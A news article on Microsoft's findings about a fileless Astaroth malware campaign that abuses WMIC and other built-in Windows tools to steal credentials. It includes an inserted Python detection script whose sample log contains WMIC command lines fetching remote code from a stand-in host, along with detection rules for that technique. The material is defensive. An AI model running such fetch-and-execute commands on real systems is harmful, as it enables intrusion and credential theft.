Microsoft sounds the alarms over hard-to-detect Astaroth malware

MICROSOFT HAS SOUNDED the alarm over a fileless campaign delivering the Astaroth malware, which runs on victims’ PCs without ever writing a malicious executable to disk.

Astaroth was first spotted in 2018 and was detected again in February this year in campaigns targeting Brazilian and European users. Most recently, the Microsoft Defender ATP Research Team identified it in campaigns running in May and June this year.

Astaroth includes a keylogger module, intercepts operating system calls and monitors the clipboard in order to steal sensitive data such as keystrokes and credentials from victims’ computers.

According to Microsoft, the perpetrators behind the Astaroth campaign are using what it describes as “living off the land techniques” to spread the malware, while making it difficult for antivirus and other security software to spot the attacks.

Microsoft’s security team noticed the recent campaigns after detecting an abrupt increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool.

A detailed analysis of those events revealed a campaign in which attackers sent phishing emails containing a link to a malicious .LNK shortcut file.

Opening the .LNK file launches the legitimate WMIC tool along with several other built-in Windows tools, which download further code straight into system memory. These tools pass their output to one another without writing anything to the hard drive.

Finally, Astaroth itself is loaded and run on the system. The Trojan dumps credentials for a wide range of applications and uploads the stolen data to a remote command-and-control server.

Because no malicious file is written to disk at any point in the infection chain, traditional antivirus software, which relies on scanning files, struggles to detect the malicious code, according to Microsoft’s security experts.
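As an added illustration (not code from the original article or from Microsoft), the following Python sketch shows the two detection ideas in the passage above: flagging WMIC processes that fetch a remote resource or are launched straight from the user's shell, as a double-clicked .LNK would be, and spotting an abrupt rise in WMIC executions against a daily baseline. The log lines are constructed, the pipe-delimited event format is assumed, and the `/format:` URL argument is an assumption about what such a command line might look like rather than something the article states.

```python
import re
import statistics
from collections import Counter

# Constructed sample process-creation events (not real telemetry), one per line:
# timestamp | host | parent image | image | command line
# The /format: URL argument is an assumed shape for a WMIC command that pulls
# code from a remote host; the article only says WMIC fetched code into memory.
SAMPLE_LOG = """\
2019-05-06T09:01:10 | ws01 | services.exe | wmic.exe | wmic.exe computersystem get name
2019-05-07T09:02:44 | ws02 | services.exe | wmic.exe | wmic.exe os get caption
2019-05-08T09:03:01 | ws01 | services.exe | wmic.exe | wmic.exe computersystem get name
2019-05-09T10:15:00 | ws03 | explorer.exe | wmic.exe | wmic.exe os get /format:"https://cdn.example.invalid/v.xsl"
2019-05-09T10:15:01 | ws04 | explorer.exe | wmic.exe | wmic.exe os get /format:"https://cdn.example.invalid/v.xsl"
2019-05-09T10:15:03 | ws05 | explorer.exe | wmic.exe | wmic.exe os get /format:"https://cdn.example.invalid/v.xsl"
2019-05-09T10:15:04 | ws06 | explorer.exe | wmic.exe | wmic.exe os get /format:"https://cdn.example.invalid/v.xsl"
2019-05-09T10:16:00 | ws01 | explorer.exe | notepad.exe | notepad.exe notes.txt
2019-05-09T10:16:30 | ws03 | services.exe | wmic.exe | wmic.exe computersystem get name
"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def parse_events(log_text):
    """Turn the pipe-delimited lines into dicts; the day is taken from the timestamp."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmd = [f.strip() for f in line.split("|", 4)]
        events.append({"ts": ts, "day": ts[:10], "host": host,
                       "parent": parent.lower(), "image": image.lower(), "cmd": cmd})
    return events


def classify_wmic(ev):
    """Return the reasons a wmic.exe event looks suspicious, or None if it does not.

    remote-url: the command line references an http(s) resource, i.e. WMIC is
                being used to fetch code rather than to query the local system.
    user-shell-parent: spawned directly by explorer.exe, which is what a user
                double-clicking a shortcut (.LNK) produces; assumed indicator.
    """
    if ev["image"] != "wmic.exe":
        return None
    reasons = []
    if URL_RE.search(ev["cmd"]):
        reasons.append("remote-url")
    if ev["parent"] == "explorer.exe":
        reasons.append("user-shell-parent")
    return reasons or None


def find_suspicious(events):
    """List (host, timestamp, reasons) for every WMIC event that trips a rule."""
    hits = []
    for ev in events:
        reasons = classify_wmic(ev)
        if reasons:
            hits.append((ev["host"], ev["ts"], reasons))
    return hits


def wmic_daily_counts(events):
    """Count wmic.exe launches per day across the fleet."""
    return Counter(ev["day"] for ev in events if ev["image"] == "wmic.exe")


def spike_days(counts, factor=3.0):
    """Days whose WMIC count exceeds `factor` times the mean of all earlier days.

    This is the crude 'abrupt increase' signal: the first day has no baseline
    and is never flagged.
    """
    flagged, history = [], []
    for day in sorted(counts):
        n = counts[day]
        if history and n > factor * statistics.mean(history):
            flagged.append(day)
        history.append(n)
    return flagged


if __name__ == "__main__":
    events = parse_events(SAMPLE_LOG)
    for host, ts, reasons in find_suspicious(events):
        print(f"{ts} {host}: wmic.exe flagged ({', '.join(reasons)})")
    print("WMIC spike days:", spike_days(wmic_daily_counts(events)))
```

In the sample data the four explorer.exe-spawned WMIC events with a remote URL are flagged on both rules, the routine inventory queries from services.exe are not, and 2019-05-09 stands out as a spike because its five WMIC launches are well above the one-per-day baseline of the preceding days. In a real deployment the baseline would be built from weeks of process-creation telemetry rather than three days, and the remote-URL rule is the higher-fidelity signal of the two.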

“This technique is called living off the land: using legitimate tools that are already present on the target system to masquerade as regular activity,” said Andrea Lelli, a member of the Windows Defender ATP team.

“The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground,” she added.

Lelli added that being fileless doesn’t mean that the malware is invisible or undetectable: “Some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”